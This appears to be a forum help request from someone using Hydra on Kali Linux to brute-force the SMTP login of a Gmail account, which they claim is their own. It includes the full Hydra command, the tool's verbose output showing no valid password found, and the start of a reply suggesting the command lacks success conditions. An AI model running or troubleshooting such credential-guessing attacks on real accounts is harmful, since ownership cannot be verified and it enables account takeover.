I'm trying to break into my OWN gmail account. But it's not working. Does anyone have any ideas? Is there anything I can do to further isolate the problem? I'm running Kali 2016.1 on virtual box. I'm hardwired directly to my modem with NAT mode turned on in VB. Here is what I tried below.
EDIT: I also changed the -t flag to 1. It may not have liked having 4 request at once. Same results more or less.
hydra -l ********@gmail.com -P passwords.txt -s 465 -S -v -V -t 4 smtp.gmail.com smtp
Now here are the results.
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-08-10 16:21:32
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[WARNING] Google Mail has bruteforce detection and sends false positives. You are not doing anything illegal right?!
[DATA] max 4 tasks per 1 server, overall 64 tasks, 4 login tries (l:1/p:4), ~0 tries per task
[DATA] attacking service smtp on port 465 with SSL
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "aaaa" - 1 of 4 [child 0]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "*******************" - 2 of 4 [child 1]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "jkjh" - 3 of 4 [child 2]
[ATTEMPT] target smtp.gmail.com - login "********@gmail.com" - pass "" - 4 of 4 [child 3]
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[VERBOSE] using SMTP LOGIN AUTH mechanism
[STATUS] attack finished for smtp.gmail.com (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-08-10 16:21:33
messages? I also notice that you did not specify the success conditions in your hydra command.